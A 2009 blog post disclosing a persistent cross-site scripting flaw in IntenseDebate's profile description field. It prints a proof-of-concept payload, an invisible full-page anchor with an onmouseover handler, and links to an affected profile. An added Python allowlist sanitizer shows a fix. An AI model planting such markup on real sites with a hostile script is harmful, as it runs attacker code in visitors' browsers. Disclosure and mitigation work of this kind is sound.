This site is soon to be deprecated by http://www.johnleitch.net

Friday, September 25, 2009

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 (persistent) XSS vulnerability. Using it, arbitrary script can be run in a visitor's browser when the affected profile is viewed or when the mouse cursor is over the avatar shown next to comments posted by the account.





<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133
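A server-side mitigation for this kind of injection, shown as an added example that is not part of the original post or Intense Debate's code: an allowlist sanitizer applied to the profile description before it is rendered. The tag/attribute policy and all names here are assumptions; the sample input is the markup shown above.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical policy for a profile description: tag -> attributes that survive.
ALLOWED = {"a": {"href"}, "b": set(), "i": set(), "em": set(), "strong": set(), "br": set()}
VOID = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto"}


class ProfileSanitizer(HTMLParser):
    """Rebuilds markup from parser events, emitting only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown tag dropped; any text inside it is still escaped as data
        kept = []
        for name, value in attrs:
            # style= and every on* handler are not in the allowlist, so they vanish here
            if name not in ALLOWED[tag] or value is None:
                continue
            if name == "href" and urlsplit(value.strip()).scheme.lower() not in SAFE_SCHEMES:
                continue  # rejects javascript:, data:, and scheme-less values
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def sanitize_profile(html_in: str) -> str:
    parser = ProfileSanitizer()
    parser.feed(html_in)
    parser.close()  # flushes text buffered by convert_charrefs
    return "".join(parser.out)


# The markup from the post: a page-sized invisible anchor with a mouse handler.
PAYLOAD = ('<a style="position:absolute;top:-500px;left:-500px;width:9999px;'
           'height:9999px;" onmouseover="alert(0)"></a>')
```

If the description field does not need markup at all, escaping the whole value on output is the simpler fix; the allowlist only matters when some formatting must be preserved.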

4 comments:

  1. Thanks for the information, I get a better understanding about the issue. And hope that you have more posts for us to read.

  2. XSS vulnerabilities have been reported and exploited since the 1990s. Prominent sites affected in the past include the social-networking sites Twitter, Facebook, MySpace, and Orkut. In recent years, cross-site scripting flaws surpassed buffer overflows to become the most common publicly-reported security vulnerability, with some researchers viewing as many as 68% of websites as likely open to XSS attacks.

  3. I'm very glad to recognize this site
